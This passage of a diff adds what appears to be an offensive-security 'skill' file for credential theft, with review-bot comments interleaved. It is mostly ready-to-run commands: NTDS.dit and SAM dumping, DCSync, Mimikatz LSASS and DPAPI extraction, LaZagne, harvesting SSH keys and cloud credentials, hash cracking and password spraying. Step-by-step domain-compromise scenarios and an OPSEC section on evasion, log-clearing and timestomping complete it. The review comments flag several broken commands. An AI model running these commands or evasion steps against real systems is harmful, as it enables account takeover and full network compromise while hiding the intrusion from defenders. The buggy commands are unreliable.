copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\SYSTEM_vss
|
|
252
|
+
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\ntds\ntds.dit C:\Windows\Temp\ntds.dit
|
|
253
|
+
```
|
|
254
|
+
|
|
255
|
+
#### 2E. Remote Dump with secretsdump.py (No File on Target)
|
|
256
|
+
|
|
257
|
+
```bash
|
|
258
|
+
# Dump SAM + LSA secrets remotely using admin credentials
|
|
259
|
+
impacket-secretsdump DOMAIN/Administrator:Password@TARGET_IP
|
|
260
|
+
|
|
261
|
+
# With NTLM hash (pass-the-hash)
|
|
262
|
+
impacket-secretsdump -hashes :NTLM_HASH DOMAIN/Administrator@TARGET_IP
|
|
263
|
+
|
|
264
|
+
# Against domain controller (dumps all domain hashes via VSS)
|
|
265
|
+
impacket-secretsdump DOMAIN/DomainAdmin:Password@DC_IP -just-dc
|
|
266
|
+
|
|
267
|
+
# DCSync (no VSS, uses replication protocol — much stealthier on DC)
|
|
268
|
+
impacket-secretsdump DOMAIN/DomainAdmin:Password@DC_IP -just-dc-user Administrator
|
|
269
|
+
impacket-secretsdump DOMAIN/DomainAdmin:Password@DC_IP -just-dc-ntlm
|
|
270
|
+
|
|
271
|
+
# Parse NTDS.dit offline after transfer
|
|
272
|
+
impacket-secretsdump -ntds /tmp/ntds.dit -system /tmp/SYSTEM LOCAL
|
|
273
|
+
```
|
|
274
|
+
|
|
275
|
+
#### 2F. DCSync via Mimikatz (Stealthiest DC Attack)
|
|
276
|
+
|
|
277
|
+
```powershell
|
|
278
|
+
# On a machine with DA or replication rights:
|
|
279
|
+
mimikatz.exe "lsadump::dcsync /domain:CORP.LOCAL /user:Administrator" "exit"
|
|
280
|
+
|
|
281
|
+
# Dump all domain hashes (noisy — only do in authorized engagements with explicit scope):
|
|
282
|
+
mimikatz.exe "lsadump::dcsync /domain:CORP.LOCAL /all /csv" "exit"
|
|
283
|
+
```
|
|
284
|
+
|
|
285
|
+
#### 2G. DPAPI — Saved Credentials Decryption
|
|
286
|
+
|
|
287
|
+
```powershell
|
|
288
|
+
# List DPAPI credential blobs for current user
|
|
289
|
+
dir "%APPDATA%\Microsoft\Credentials\"
|
|
290
|
+
dir "%LOCALAPPDATA%\Microsoft\Credentials\"
|
|
291
|
+
|
|
292
|
+
# Dump master keys (requires Mimikatz as current user or SYSTEM):
|
|
293
|
+
mimikatz.exe "dpapi::cred /in:%APPDATA%\Microsoft\Credentials\<BLOB_FILE>" "exit"
|
|
294
|
+
|
|
295
|
+
# If SYSTEM: decrypt domain backup key to decrypt any user's masterkey
|
|
296
|
+
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" "exit"
|
|
297
|
+
|
|
298
|
+
# Decrypt specific blob with masterkey GUID:
|
|
299
|
+
mimikatz.exe "dpapi::masterkey /in:%APPDATA%\Microsoft\Protect\<SID>\<GUID> /rpc" "dpapi::cred /in:%APPDATA%\Microsoft\Credentials\<BLOB>" "exit"
|
|
300
|
+
```
|
|
301
|
+
|
|
302
|
+
#### 2H. Browser Credentials with LaZagne
|
|
303
|
+
|
|
304
|
+
```cmd
|
|
305
|
+
# Transfer lazagne.exe to target and run
|
|
306
|
+
lazagne.exe browsers
|
|
307
|
+
lazagne.exe all # All supported modules
|
|
308
|
+
lazagne.exe all -oJ # JSON output
|
|
309
|
+
lazagne.exe all -oA -output C:\Windows\Temp\creds
|
|
310
|
+
```
|
|
311
|
+
|
|
312
|
+
```bash
|
|
313
|
+
# On Linux (run as current user):
|
|
314
|
+
python3 /opt/lazagne/laZagne.py all
|
|
315
|
+
python3 /opt/lazagne/laZagne.py browsers
|
|
316
|
+
python3 /opt/lazagne/laZagne.py all -oJ -output /tmp/
|
|
317
|
+
```
|
|
318
|
+
|
|
319
|
+
#### 2I. Windows Credential Manager
|
|
320
|
+
|
|
321
|
+
```cmd
|
|
322
|
+
# List stored credentials
|
|
323
|
+
cmdkey /list
|
|
324
|
+
|
|
325
|
+
# Dump via Mimikatz (requires admin):
|
|
326
|
+
mimikatz.exe "privilege::debug" "sekurlsa::credman" "exit"
|
|
327
|
+
|
|
328
|
+
# PowerShell enumeration:
|
|
329
|
+
[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
|
|
330
|
+
$vault = New-Object Windows.Security.Credentials.PasswordVault
|
|
331
|
+
$vault.RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ }
|
|
332
|
+
```
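Review bot: lines 329-331 of 2I are PowerShell (the WinRT type accelerator and `New-Object`) sitting inside a fence tagged `cmd`, where they will not run; move them to their own `powershell` fence. Worth a comment as well: `PasswordVault` exposes only the calling user's Web Credentials store, not the Windows credentials that `cmdkey /list` enumerates, so the two listings are complementary rather than interchangeable.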
|
|
333
|
+
|
|
334
|
+
### Phase 3 — Linux Credential Extraction
|
|
335
|
+
|
|
336
|
+
#### 3A. /etc/shadow Extraction
|
|
337
|
+
|
|
338
|
+
```bash
|
|
339
|
+
# Read shadow file (requires root)
|
|
340
|
+
cat /etc/shadow
|
|
341
|
+
|
|
342
|
+
# Combine with /etc/passwd for cracking
|
|
343
|
+
unshadow /etc/passwd /etc/shadow > /tmp/unshadowed.txt
|
|
344
|
+
|
|
345
|
+
# Also check:
|
|
346
|
+
cat /etc/passwd # Check for old-style password field (not 'x')
|
|
347
|
+
cat /etc/master.passwd # BSD systems
|
|
348
|
+
```
|
|
349
|
+
|
|
350
|
+
#### 3B. SSH Private Key Hunting
|
|
351
|
+
|
|
352
|
+
```bash
|
|
353
|
+
# Find SSH private keys across the system
|
|
354
|
+
find / -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "*.pem" 2>/dev/null
|
|
355
|
+
find / -name "authorized_keys" 2>/dev/null # Find where keys are accepted
|
|
356
|
+
|
|
357
|
+
# Check home directories
|
|
358
|
+
for dir in /home/*; do ls -la $dir/.ssh/ 2>/dev/null; done
|
|
359
|
+
ls -la /root/.ssh/
|
|
360
|
+
|
|
361
|
+
# Check for passphrase-protected keys (try empty passphrase first)
|
|
362
|
+
ssh-keygen -y -f /path/to/key # Prompts if passphrase required
|
|
363
|
+
|
|
364
|
+
# If protected, crack with John:
|
|
365
|
+
python3 /usr/share/john/ssh2john.py /path/to/id_rsa > /tmp/ssh_hash.txt
|
|
366
|
+
john /tmp/ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
|
|
367
|
+
```
|
|
368
|
+
|
|
369
|
+
#### 3C. Bash History and Config File Mining
|
|
370
|
+
|
|
371
|
+
```bash
|
|
372
|
+
# Current and other user histories
|
|
373
|
+
cat ~/.bash_history
|
|
374
|
+
cat ~/.zsh_history
|
|
375
|
+
cat ~/.fish_history
|
|
376
|
+
for user in $(cat /etc/passwd | cut -d: -f1,6 | grep -v nologin | grep -v false | cut -d: -f2); do
|
|
377
|
+
echo "=== $user ===" && cat $user/.bash_history 2>/dev/null
|
|
378
|
+
done
|
|
379
|
+
|
|
380
|
+
# Grep for credentials in histories
|
|
381
|
+
grep -iE "(pass|pwd|secret|key|token|api|bearer|auth|curl.*-u|mysql.*-p|psql.*-W)" ~/.bash_history
|
|
382
|
+
|
|
383
|
+
# Application configuration files
|
|
384
|
+
find / -name "*.conf" -o -name "*.cfg" -o -name "*.ini" -o -name "*.env" -o -name "*.yaml" -o -name "*.yml" 2>/dev/null | xargs grep -l -iE "(password|passwd|secret|api_key|token)" 2>/dev/null
|
|
385
|
+
|
|
386
|
+
# Web app configs
|
|
387
|
+
find /var/www /srv /opt /home -name "wp-config.php" -o -name "config.php" -o -name "database.yml" -o -name ".env" 2>/dev/null
|
|
388
|
+
cat /var/www/html/wp-config.php 2>/dev/null | grep -iE "DB_PASS|DB_USER"
|
|
389
|
+
|
|
390
|
+
# Database credential files
|
|
391
|
+
cat ~/.my.cnf 2>/dev/null
|
|
392
|
+
cat ~/.pgpass 2>/dev/null
|
|
393
|
+
cat /etc/mysql/debian.cnf 2>/dev/null
|
|
394
|
+
|
|
395
|
+
# Cloud credential files
|
|
396
|
+
cat ~/.aws/credentials 2>/dev/null
|
|
397
|
+
cat ~/.aws/config 2>/dev/null
|
|
398
|
+
cat ~/.config/gcloud/application_default_credentials.json 2>/dev/null
|
|
399
|
+
cat ~/.azure/accessTokens.json 2>/dev/null
|
|
400
|
+
|
|
401
|
+
# Docker and Kubernetes
|
|
402
|
+
cat ~/.docker/config.json 2>/dev/null
|
|
403
|
+
cat ~/.kube/config 2>/dev/null
|
|
404
|
+
|
|
405
|
+
# SSH config (reveals hostnames, users, key paths for lateral movement)
|
|
406
|
+
cat ~/.ssh/config 2>/dev/null
|
|
407
|
+
cat /etc/ssh/ssh_config 2>/dev/null
|
|
408
|
+
```
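Review bot: the per-user history loop at lines 376-378 is broken: `cut -d: -f1,6` keeps only the username and home directory, so `grep -v nologin` and `grep -v false` never see the shell field (field 7) and filter nothing, and `$user` ends up holding the home directory, which the `=== $user ===` banner then prints as if it were a username. Select fields 1, 6 and 7, filter on the shell field, print the name, and quote the home path when reading from it, since home directories can contain spaces.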
|
|
409
|
+
|
|
410
|
+
#### 3D. Running Process and Memory Mining
|
|
411
|
+
|
|
412
|
+
```bash
|
|
413
|
+
# Check running processes for credentials in command-line args
|
|
414
|
+
ps auxww | grep -iE "(pass|pwd|secret|token|key)"
|
|
415
|
+
|
|
416
|
+
# Check /proc for sensitive environment variables of running processes
|
|
417
|
+
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
|
|
418
|
+
cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n' | grep -iE "(pass|pwd|secret|key|token|api)"
|
|
419
|
+
done
|
|
420
|
+
|
|
421
|
+
# Check process memory strings (requires root or same user as process)
|
|
422
|
+
strings /proc/<PID>/mem 2>/dev/null | grep -iE "(password|passwd|secret)"
|
|
423
|
+
```
|
|
424
|
+
|
|
425
|
+
### Phase 4 — Hash Cracking with Hashcat
|
|
426
|
+
|
|
427
|
+
```bash
|
|
428
|
+
# Identify hash type before cracking
|
|
429
|
+
hashcat --identify /tmp/hashes.txt
|
|
430
|
+
|
|
431
|
+
# NTLM hashes (Windows) — hashcat mode 1000
|
|
432
|
+
hashcat -m 1000 /tmp/ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
433
|
+
hashcat -m 1000 /tmp/ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
|
|
434
|
+
|
|
435
|
+
# NTLMv2 (Net-NTLMv2 from Responder captures) — mode 5600
|
|
436
|
+
hashcat -m 5600 /tmp/netntlmv2.txt /usr/share/wordlists/rockyou.txt
|
|
437
|
+
|
|
438
|
+
# MD5 — mode 0
|
|
439
|
+
hashcat -m 0 /tmp/md5_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
440
|
+
|
|
441
|
+
# SHA-256 — mode 1400
|
|
442
|
+
hashcat -m 1400 /tmp/sha256.txt /usr/share/wordlists/rockyou.txt
|
|
443
|
+
|
|
444
|
+
# bcrypt — mode 3200 (slow)
|
|
445
|
+
hashcat -m 3200 /tmp/bcrypt.txt /usr/share/wordlists/rockyou.txt
|
|
446
|
+
|
|
447
|
+
# SHA-512 crypt (Linux /etc/shadow $6$) — mode 1800
|
|
448
|
+
hashcat -m 1800 /tmp/shadow_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
449
|
+
|
|
450
|
+
# DCC2 (domain cached credentials $DCC2$) — mode 2100
|
|
451
|
+
hashcat -m 2100 /tmp/dcc2_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
452
|
+
|
|
453
|
+
# Kerberos TGS (AS-REP, Kerberoasting) — mode 18200 / 13100
|
|
454
|
+
hashcat -m 18200 /tmp/asrep_hashes.txt /usr/share/wordlists/rockyou.txt # AS-REP roasting
|
|
455
|
+
hashcat -m 13100 /tmp/tgs_hashes.txt /usr/share/wordlists/rockyou.txt # Kerberoasting
|
|
456
|
+
|
|
457
|
+
# Use mask attack for password patterns (e.g., Company2024!)
|
|
458
|
+
hashcat -m 1000 /tmp/ntlm.txt -a 3 "Company?d?d?d?d!"
|
|
459
|
+
|
|
460
|
+
# Combination attack — combine two wordlists
|
|
461
|
+
hashcat -m 1000 /tmp/ntlm.txt -a 1 /tmp/words1.txt /tmp/words2.txt
|
|
462
|
+
|
|
463
|
+
# Show cracked passwords
|
|
464
|
+
hashcat -m 1000 /tmp/ntlm.txt --show
|
|
465
|
+
|
|
466
|
+
# John the Ripper alternative
|
|
467
|
+
john /tmp/unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt
|
|
468
|
+
john /tmp/unshadowed.txt --show
|
|
469
|
+
```
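Review bot: the comment "Kerberos TGS (AS-REP, Kerberoasting)" mislabels mode 18200: that is the AS-REP (pre-authentication reply) format, not a TGS; only 13100 is a TGS-REP (Kerberoasting) hash, so the heading should name the two separately. The `hashcat --identify` line at the top also deserves a note that it returns a list of candidate modes rather than a single answer (a bare 32-hex value matches both mode 0 and mode 1000), so the operator still has to choose before any of the runs below.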
|
|
470
|
+
|
|
471
|
+
### Phase 5 — Credential Validation and Spraying
|
|
472
|
+
|
|
473
|
+
```bash
|
|
474
|
+
# Validate a single credential against SMB
|
|
475
|
+
nxc smb TARGET_IP -u Administrator -p 'Password123!'
|
|
476
|
+
nxc smb TARGET_IP -u Administrator -H NTLM_HASH # Pass-the-hash
|
|
477
|
+
|
|
478
|
+
# Spray a credential across a subnet
|
|
479
|
+
nxc smb 192.168.1.0/24 -u Administrator -p 'Password123!'
|
|
480
|
+
|
|
481
|
+
# Spray against a list of users
|
|
482
|
+
nxc smb TARGET_IP -u /tmp/users.txt -p 'Winter2024!' --continue-on-success
|
|
483
|
+
|
|
484
|
+
# WinRM validation
|
|
485
|
+
nxc winrm TARGET_IP -u Administrator -p 'Password123!'
|
|
486
|
+
|
|
487
|
+
# SSH validation
|
|
488
|
+
nxc ssh TARGET_IP -u root -p 'Password123!'
|
|
489
|
+
ssh -i /tmp/stolen_id_rsa user@TARGET_IP
|
|
490
|
+
|
|
491
|
+
# Validate domain credentials
|
|
492
|
+
nxc smb DC_IP -u DomainUser -p 'Password123!' -d CORP.LOCAL
|
|
493
|
+
```
|
|
494
|
+
|
|
495
|
+
---
|
|
496
|
+
|
|
497
|
+
## Real Attack Scenarios
|
|
498
|
+
|
|
499
|
+
### Scenario 1 — Windows Internal Network: Local Admin to Domain Admin
|
|
500
|
+
|
|
501
|
+
**Context:** You have a Meterpreter shell on a Windows 10 workstation as a local admin. Goal: extract domain admin credentials.
|
|
502
|
+
|
|
503
|
+
```bash
|
|
504
|
+
# Step 1: From Meterpreter, migrate to a SYSTEM process or use getsystem
|
|
505
|
+
# In Meterpreter:
|
|
506
|
+
getsystem
|
|
507
|
+
getuid # Should show NT AUTHORITY\SYSTEM
|
|
508
|
+
|
|
509
|
+
# Step 2: Dump LSASS with Mimikatz Meterpreter module
|
|
510
|
+
load kiwi
|
|
511
|
+
creds_all
|
|
512
|
+
lsa_dump_sam
|
|
513
|
+
|
|
514
|
+
# Step 3: Look for domain user credentials in output
|
|
515
|
+
# If domain user credentials are found (plaintext or NTLM hash):
|
|
516
|
+
# Note: CORP\jsmith : NTLMhash_value
|
|
517
|
+
|
|
518
|
+
# Step 4: Validate the hash against the DC
|
|
519
|
+
nxc smb DC_IP -u jsmith -H NTLM_HASH -d CORP.LOCAL
|
|
520
|
+
|
|
521
|
+
# Step 5: If jsmith has DA rights, run DCSync to dump all hashes
|
|
522
|
+
impacket-secretsdump -hashes :NTLM_HASH CORP.LOCAL/jsmith@DC_IP -just-dc-ntlm
|
|
523
|
+
|
|
524
|
+
# Step 6: Crack the krbtgt hash for Golden Ticket (if in scope)
|
|
525
|
+
hashcat -m 1000 /tmp/dc_hashes.txt /usr/share/wordlists/rockyou.txt
|
|
526
|
+
|
|
527
|
+
# Step 7: Document all found credentials with context
|
|
528
|
+
```
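Review bot: Step 6 runs hashcat on `/tmp/dc_hashes.txt`, but nothing in the block writes that file: the Step 5 secretsdump has no `-outputfile`, so its results go to stdout only. Add `-outputfile` there, as Scenario 3 does, or redirect the output. The Step 6 comment is also misleading: the krbtgt account's password is machine-generated and not a realistic cracking target, and Scenario 3 Step 8 correctly only locates the krbtgt entry; reword the comment to say what the cracking pass is actually for (user passwords, feeding the reuse and pattern analysis the report section asks for).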
|
|
529
|
+
|
|
530
|
+
---
|
|
531
|
+
|
|
532
|
+
### Scenario 2 — Linux Web Server Compromise: App Creds to Root
|
|
533
|
+
|
|
534
|
+
**Context:** You have a low-privilege shell on a Linux web server (www-data). Goal: escalate to root and extract all credentials.
|
|
535
|
+
|
|
536
|
+
```bash
|
|
537
|
+
# Step 1: Mine application config files for database passwords
|
|
538
|
+
find /var/www -name "*.php" -o -name "*.env" -o -name "*.conf" 2>/dev/null | \
|
|
539
|
+
xargs grep -l -iE "(password|DB_PASS|secret)" 2>/dev/null
|
|
540
|
+
|
|
541
|
+
cat /var/www/html/app/.env
|
|
542
|
+
# Found: DB_PASSWORD=SuperSecret123
|
|
543
|
+
|
|
544
|
+
# Step 2: Connect to database and extract password hashes
|
|
545
|
+
mysql -u webapp_user -p'SuperSecret123' -e "SELECT user, authentication_string FROM mysql.user;" 2>/dev/null
|
|
546
|
+
|
|
547
|
+
# Step 3: Check bash history of www-data and other users
|
|
548
|
+
cat ~/.bash_history | grep -iE "(pass|sudo|su |ssh)"
|
|
549
|
+
|
|
550
|
+
# Step 4: Hunt for SSH keys
|
|
551
|
+
find /home /var/www /root -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
|
|
552
|
+
# Found: /home/deploy/.ssh/id_rsa
|
|
553
|
+
|
|
554
|
+
# Step 5: Use the deploy key to SSH to other systems
|
|
555
|
+
ssh -i /home/deploy/.ssh/id_rsa deploy@192.168.10.50
|
|
556
|
+
|
|
557
|
+
# Step 6: If root is obtained (via sudo/kernel exploit), extract /etc/shadow
|
|
558
|
+
sudo cat /etc/shadow > /tmp/shadow.txt
|
|
559
|
+
unshadow /etc/passwd /etc/shadow > /tmp/unshadowed.txt
|
|
560
|
+
|
|
561
|
+
# Step 7: Transfer to Kali and crack
|
|
562
|
+
scp attacker@KALI_IP:/tmp/unshadowed.txt .
|
|
563
|
+
hashcat -m 1800 /tmp/unshadowed.txt /usr/share/wordlists/rockyou.txt
|
|
564
|
+
```
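Review bot: Step 7's `scp attacker@KALI_IP:/tmp/unshadowed.txt .` copies in the wrong direction: it pulls a file from the Kali host onto the compromised server instead of moving the dump off it, so the comment "Transfer to Kali and crack" does not match the command. Two smaller problems in the same block: Step 6's `sudo cat /etc/shadow > /tmp/shadow.txt` creates a copy that nothing afterwards uses, and `hashcat -m 1800` is fed `unshadow` output, whose seven-field passwd-style lines hashcat does not parse; the Phase 4 block already pairs unshadow output with `john`, which is the tool that consumes that format, or the hash field has to be cut out first.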
|
|
565
|
+
|
|
566
|
+
---
|
|
567
|
+
|
|
568
|
+
### Scenario 3 — Remote Domain Controller: Secretsdump + Full Domain Compromise
|
|
569
|
+
|
|
570
|
+
**Context:** You have obtained Domain Admin credentials through phishing + privilege escalation. Goal: dump entire Active Directory for documentation.
|
|
571
|
+
|
|
572
|
+
```bash
|
|
573
|
+
# Step 1: Validate DA credentials
|
|
574
|
+
nxc smb DC_IP -u 'DomainAdmin' -p 'Passw0rd!' -d CORP.LOCAL --shares
|
|
575
|
+
|
|
576
|
+
# Step 2: Remote secretsdump against DC (VSS method — dumps NTDS.dit remotely)
|
|
577
|
+
impacket-secretsdump 'CORP.LOCAL/DomainAdmin:Passw0rd!@DC_IP' -just-dc -outputfile /tmp/corp_domain_dump
|
|
578
|
+
|
|
579
|
+
# Step 3: Review output files
|
|
580
|
+
cat /tmp/corp_domain_dump.ntds | head -50
|
|
581
|
+
# Format: domain\user:RID:LM_HASH:NTLM_HASH:::
|
|
582
|
+
|
|
583
|
+
# Step 4: Extract just NTLM hashes for cracking
|
|
584
|
+
cut -d: -f4 /tmp/corp_domain_dump.ntds > /tmp/ntlm_only.txt
|
|
585
|
+
|
|
586
|
+
# Step 5: Crack with hashcat — prioritize high-value accounts
|
|
587
|
+
# First check if Administrator hash is already known:
|
|
588
|
+
grep "Administrator" /tmp/corp_domain_dump.ntds
|
|
589
|
+
|
|
590
|
+
# Run cracking job:
|
|
591
|
+
hashcat -m 1000 /tmp/ntlm_only.txt /usr/share/wordlists/rockyou.txt \
|
|
592
|
+
-r /usr/share/hashcat/rules/best64.rule \
|
|
593
|
+
-r /usr/share/hashcat/rules/d3ad0ne.rule \
|
|
594
|
+
-o /tmp/cracked.txt
|
|
595
|
+
|
|
596
|
+
# Step 6: Map cracked passwords back to usernames
|
|
597
|
+
hashcat -m 1000 /tmp/ntlm_only.txt --show --username
|
|
598
|
+
|
|
599
|
+
# Step 7: Check for password reuse across accounts
|
|
600
|
+
# Extract cracked passwords
|
|
601
|
+
cut -d: -f2 /tmp/cracked.txt | sort -u > /tmp/passwords.txt
|
|
602
|
+
|
|
603
|
+
# Spray cracked passwords against other services
|
|
604
|
+
nxc smb 192.168.1.0/24 -u /tmp/users.txt -p /tmp/passwords.txt --continue-on-success
|
|
605
|
+
|
|
606
|
+
# Step 8: Check for krbtgt hash (enables Golden Ticket)
|
|
607
|
+
grep "krbtgt" /tmp/corp_domain_dump.ntds
|
|
608
|
+
|
|
609
|
+
# Step 9: Dump browser credentials on DA workstation (lateral move)
|
|
610
|
+
nxc smb DA_WORKSTATION_IP -u 'DomainAdmin' -p 'Passw0rd!' -d CORP.LOCAL \
|
|
611
|
+
--exec-method smbexec \
|
|
612
|
+
-x "lazagne.exe all -oJ"
|
|
613
|
+
```
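Review bot: Step 2's comment says "VSS method", but `impacket-secretsdump -just-dc` uses the DRSUAPI replication path (DCSync) by default; VSS is a separate, opt-in method. The distinction matters for the Detection Risks table further down: this step belongs to the DCSync row (replication RPC from a non-DC host, Event ID 4662), not the VSS row (Event ID 8222). Step 7 also sprays an entire cracked-password list against a user list with `--continue-on-success`, which contradicts item 8 of the OPSEC list on lockout thresholds; the two passages should agree.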
|
|
614
|
+
|
|
615
|
+
---
|
|
616
|
+
|
|
617
|
+
## OPSEC Considerations
|
|
618
|
+
|
|
619
|
+
### Detection Risks
|
|
620
|
+
|
|
621
|
+
| Technique | Detection Risk | Triggered By |
|
|
622
|
+
|---|---|---|
|
|
623
|
+
| sekurlsa::logonpasswords | CRITICAL | LSASS access, Mimikatz signatures, Event ID 10 (Sysmon) |
|
|
624
|
+
| comsvcs.dll MiniDump | HIGH | rundll32 + comsvcs.dll + lsass.exe in process tree |
|
|
625
|
+
| secretsdump.py remote | HIGH | SMB pipe SVCCTL, remote service creation, Event ID 7045 |
|
|
626
|
+
| DCSync | MEDIUM-HIGH | Replication RPCs from non-DC machine, Event ID 4662 |
|
|
627
|
+
| VSS shadow copy creation | MEDIUM | Event ID 8222 (VSS), unusual wmic.exe activity |
|
|
628
|
+
| SAM/SYSTEM reg export | MEDIUM | reg.exe saving HKLM\SAM, Event ID 4663 |
|
|
629
|
+
| LaZagne | HIGH | Process creation from temp dirs, network requests, Defender signatures |
|
|
630
|
+
| /etc/shadow read | MEDIUM | auditd file access logs (if configured) |
|
|
631
|
+
| SSH key access | LOW-MEDIUM | File access logs if auditd active |
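Review bot: the Detection Risks table is missing rows for several techniques this skill uses, most notably the credential spraying in Phase 5 and Scenario 3 Step 7, which produces failed-logon events in volume (4625 on the target host, 4771/4776 on the domain controller) and is one of the most reliably alerted behaviours in the whole file; the DPAPI and Credential Manager steps (2G, 2I) and the `/proc` environment mining in 3D have no entry either. Add rows so the table covers every phase above it.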
|
|
632
|
+
|
|
633
|
+
### Mitigation Strategies for Operators (Reduce Footprint)
|
|
634
|
+
|
|
635
|
+
```bash
|
|
636
|
+
# 1. Use C2-integrated credential dumping (e.g., Cobalt Strike kiwi, Havoc, Sliver)
|
|
637
|
+
# — avoids dropping files to disk
|
|
638
|
+
|
|
639
|
+
# 2. For LSASS, prefer API-based dumps over mimikatz.exe on disk
|
|
640
|
+
# — Use SharpDump, Nanodump, or custom loader
|
|
641
|
+
|
|
642
|
+
# 3. Rename output files to benign names
|
|
643
|
+
# — lsass.dmp → werfault.dmp, creds.txt → update.log
|
|
644
|
+
|
|
645
|
+
# 4. Delete artifacts immediately after transfer
|
|
646
|
+
del C:\Windows\Temp\SAM C:\Windows\Temp\SYSTEM C:\Windows\Temp\lsass.dmp
|
|
647
|
+
|
|
648
|
+
# 5. Prefer DCSync over LSASS dump on domain controllers
|
|
649
|
+
# — DCSync touches no files on the DC, lower EDR signature
|
|
650
|
+
|
|
651
|
+
# 6. Avoid running LaZagne or Mimikatz from common temp paths
|
|
652
|
+
# — Use %APPDATA%, user writable paths, or in-memory execution
|
|
653
|
+
|
|
654
|
+
# 7. Hash cracking always done on operator machine (offline)
|
|
655
|
+
# — Never crack on the target
|
|
656
|
+
|
|
657
|
+
# 8. Validate credentials slowly — avoid lockout thresholds
|
|
658
|
+
# — Default AD lockout: 5 failed attempts
|
|
659
|
+
# — Space attempts: 1 per hour minimum for spraying
|
|
660
|
+
|
|
661
|
+
# 9. Clear bash history on Linux after mining
|
|
662
|
+
history -c && history -w
|
|
663
|
+
|
|
664
|
+
# 10. Use timestomping if file artifacts are unavoidable (Windows)
|
|
665
|
+
# Mimikatz: timestomp C:\Windows\Temp\m.exe -m "01/01/2023 00:00:00"
|
|
666
|
+
```
|
|
667
|
+
|
|
668
|
+
### EDR/AV Evasion Notes
|
|
669
|
+
|
|
670
|
+
- Mimikatz is heavily signatured. Use obfuscated builds, in-memory loading (Invoke-Mimikatz, SharpKatz), or C2 kiwi modules
|
|
671
|
+
- comsvcs.dll MiniDump is now flagged by most modern EDRs — consider API-based alternatives (MalSecLogon, NanoDump)
|
|
672
|
+
- secretsdump.py generates distinct SMB traffic patterns — use with caution against monitored environments
|
|
673
|
+
- Windows Defender blocks most credential dumping by default on modern Windows — check PPL (Protected Process Light) status of LSASS
|
|
674
|
+
- Check if LSASS is PPL-protected before attempting memory dump:
|
|
675
|
+
|
|
676
|
+
```powershell
|
|
677
|
+
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL"
|
|
678
|
+
# If RunAsPPL = 1, standard LSASS dump will fail — need PPL bypass (mimidrv.sys, PPLdump)
|
|
679
|
+
```
|
|
680
|
+
|
|
681
|
+
---
|
|
682
|
+
|
|
683
|
+
## Output and Documentation Instructions
|
|
684
|
+
|
|
685
|
+
### During Engagement — Capture Everything
|
|
686
|
+
|
|
687
|
+
```bash
|
|
688
|
+
# Create organized output directory per target
|
|
689
|
+
mkdir -p /tmp/engagement/TARGET_IP/{credentials,hashes,screenshots,notes}
|
|
690
|
+
|
|
691
|
+
# Redirect all tool output
|
|
692
|
+
impacket-secretsdump ... 2>&1 | tee /tmp/engagement/TARGET_IP/credentials/secretsdump_$(date +%Y%m%d_%H%M%S).txt
|
|
693
|
+
|
|
694
|
+
# Screenshot terminal evidence (tmux logging or script)
|
|
695
|
+
script -a /tmp/engagement/TARGET_IP/notes/session_log.txt
|
|
696
|
+
# All subsequent commands logged until: exit
|
|
697
|
+
```
|
|
698
|
+
|
|
699
|
+
### Documentation Format for Report
|
|
700
|
+
|
|
701
|
+
For each credential found, document:
|
|
702
|
+
|
|
703
|
+
```
|
|
704
|
+
Host: TARGET_IP / HOSTNAME
|
|
705
|
+
Account: DOMAIN\username (or local)
|
|
706
|
+
Type: Cleartext | NTLM Hash | NTLMv2 Hash | Kerberos Hash | SSH Key | API Key
|
|
707
|
+
Value: [password or hash — redact in client-facing report if required]
|
|
708
|
+
Source: LSASS / SAM / /etc/shadow / Browser / Config File / History
|
|
709
|
+
Access Level: Local Admin | Domain User | Domain Admin | Service Account
|
|
710
|
+
Cracked: Yes/No — Cracked Password: [value]
|
|
711
|
+
Used For: Lateral movement to HOST2 / Validated only / Demonstrated reuse
|
|
712
|
+
Evidence File: /path/to/screenshot_or_log
|
|
713
|
+
```
|
|
714
|
+
|
|
715
|
+
### Redaction for Client Reports
|
|
716
|
+
|
|
717
|
+
- Always hash or truncate actual passwords in executive summaries
|
|
718
|
+
- Include full credentials in technical appendix, marked CONFIDENTIAL
|
|
719
|
+
- Document password complexity/pattern to highlight policy failures without exposing exact values (e.g., "Password followed pattern: CompanyName + Year + Symbol")
|
|
720
|
+
|
|
721
|
+
---
|
|
722
|
+
|
|
723
|
+
## Resources
|
|
724
|
+
|
|
725
|
+
### Primary Tools
|
|
726
|
+
|
|
727
|
+
- Mimikatz: https://github.com/gentilkiwi/mimikatz
|
|
728
|
+
- Impacket (secretsdump, etc.): https://github.com/fortra/impacket
|
|
729
|
+
- LaZagne: https://github.com/AlessandroZ/LaZagne
|
|
730
|
+
- pypykatz: https://github.com/skelsec/pypykatz
|
|
731
|
+
- NetExec (CME successor): https://github.com/Pennyw0rth/NetExec
|
|
732
|
+
- CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
|
|
733
|
+
- Hashcat: https://github.com/hashcat/hashcat
|
|
734
|
+
|
|
735
|
+
### Evasion and Advanced Techniques
|
|
736
|
+
|
|
737
|
+
- NanoDump (stealthy LSASS dump): https://github.com/helpsystems/nanodump
|
|
738
|
+
- SharpDump: https://github.com/GhostPack/SharpDump
|
|
739
|
+
- Rubeus (Kerberos attacks): https://github.com/GhostPack/Rubeus
|
|
740
|
+
- SharpDPAPI (DPAPI attacks): https://github.com/GhostPack/SharpDPAPI
|
|
741
|
+
- PPLdump (bypass PPL protected LSASS): https://github.com/itm4n/PPLdump
|
|
742
|
+
|
|
743
|
+
### Reference Material
|
|
744
|
+
|
|
745
|
+
